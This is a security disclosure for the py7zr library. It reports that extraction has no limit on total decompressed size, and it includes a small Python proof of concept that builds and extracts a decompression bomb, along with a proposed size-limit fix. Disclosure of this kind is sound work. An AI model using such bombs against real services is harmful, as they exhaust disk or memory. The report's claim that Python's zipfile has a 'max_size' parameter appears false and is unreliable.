py7zr's "Worker.decompress()" extracts archive entries without tracking total decompressed size. A crafted ".7z" file can exhaust disk or memory before the extraction completes. Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio). Proof of concept: import py7zr, tempfile, os create bomb: compress 100MB of zeros into ~15KB bomb_path = tempfile.mktemp(suffix='.7z') with py7zr.SevenZipFile(bomb_path, 'w') as z: import io z.writef(io.BytesIO(b'\x00' * 100 * 1024 * 1024), 'bomb.bin') print(f'archive size: {os.path.getsize(bomb_path):,} bytes') extract — no size check with py7zr.SevenZipFile(bomb_path, 'r') as z: z.extractall(path=tempfile.mkdtemp()) print('extracted 100 MB from ~15 KB archive') Root cause: "Worker.decompress()" in "py7zr/worker.py" writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's "zipfile" "max_size" parameter. Fix: track cumulative decompressed bytes and raise before writing if a limit is exceeded: MAX_EXTRACT_SIZE = 2 * 1024 ** 3 # 2 GB default, configurable total = 0 for chunk in decompressed_chunks: total += len(chunk) if total > MAX_EXTRACT_SIZE: raise py7zr.exceptions.DecompressionBombError( f'Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes' ) outfile.write(chunk) Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.